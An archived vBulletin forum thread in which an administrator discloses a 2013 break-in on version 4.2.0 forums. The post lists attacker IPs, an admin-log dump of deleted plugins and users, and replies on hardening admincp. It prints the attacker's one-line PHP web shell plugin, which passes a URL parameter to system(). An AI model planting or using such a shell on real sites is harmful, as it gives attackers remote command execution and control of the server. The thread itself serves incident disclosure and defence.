Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
  #1  
Old 09-22-2013, 08:52 PM
team74 team74 is offline
 
Join Date: Jul 2012
Posts: 4
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default v4.2.0 hacker details

This script kiddy can't handle his hormones and has gone on a rampage.

https://www.google.co.uk/#q=%22ma3kesi%22

Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in google in the past week.

IP address found in my adminlog table, you can search them yourself, from Indonesia/Burma.

203.81.72.83
101.255.62.233
email (I think not real, they didn't need a real email once inside): ma3kesi@mm.com

Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook).

What they did.
From the adminlog (descending, so first actions at the bottom.:

Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`

Code:
7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'),
(7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'),
(7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'),
(7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'),
(7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'),
(7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'),
(7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'),
(7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'),
(7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'),
(7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'),
(7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'),
(7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'),
(7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'),
(7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'),
(7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'),
(7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'),
(7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'),
(7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'),
(7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'),
(7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'),
(7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'),
(7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'),
(7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'),
(7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'),
(7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'),
(7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'),
(7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'),
(7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'),
(7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'),
(7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'),
(7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'),
(7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'),
(7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'),
(7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'),
(7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'),
(7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'),
(7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'),
(7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'),
(7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'),
(7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'),
(7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'),
(7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'),
(7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'),
(7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'),
(7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'),
(7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'),
(7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'),
(7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'),
(7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'),
(7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'),
(7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'),
(7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'),
(7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'),
(7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'),
(7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'),
(7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'),
(7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'),
(7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'),
(7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'),
(7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233');
They deleted userid 1919 so I can't check it. 1920 is still there, and is the new admin after deleting me. You can also see they exploited it with one IP, and then carried out the rest of the attack with the other.

They inserted this plugin (it was id=52 for me):

Code:
(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5);
And they deleted the default plugins that display the forum.

Initially they did change the main forum.php file too, I think this was through the admincp option because there is no sign of FTP access. I'm not a server guy, maybe they got in through SSH.

I also have about 550 lines of raw server log data, showing what these 2 IPs did. I'm not sure if I should post it for not though. It seems to start with admincp/zxc.php
Reply With Quote
2 благодарности(ей) от:
Max Taxable, smirkley
  #2  
Old 09-24-2013, 02:16 AM
pityocamptes's Avatar
pityocamptes pityocamptes is offline
 
Join Date: Apr 2010
Posts: 595
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Anyway just to post the IP's by themselves?
Reply With Quote
  #3  
Old 09-24-2013, 02:33 AM
Max Taxable's Avatar
Max Taxable Max Taxable is offline
 
Join Date: Feb 2011
Posts: 3,134
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by team74 View Post
Block these IPs, they are frequently used for all types of attacks (even on Gmail and facebook).
IP blocking is a near useless tool anymore, since IPs and even user agent strings are so easy to spoof. Great and informative post though, otherwise.
Reply With Quote
  #4  
Old 09-25-2013, 05:42 PM
alirex alirex is offline
 
Join Date: Nov 2007
Posts: 25
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

That's why i am mostly left locked my admincp with .htaccess and allowed only my own IP. Atleast i am safe since last 8 month .. only got hacked once last year and that i recovered.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:36 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.10801 seconds
  • Memory Usage 2,200KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_code
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (4)post_thanks_box
  • (2)post_thanks_box_bit
  • (4)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit
  • (4)post_thanks_postbit_info
  • (4)postbit
  • (4)postbit_onlinestatus
  • (4)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete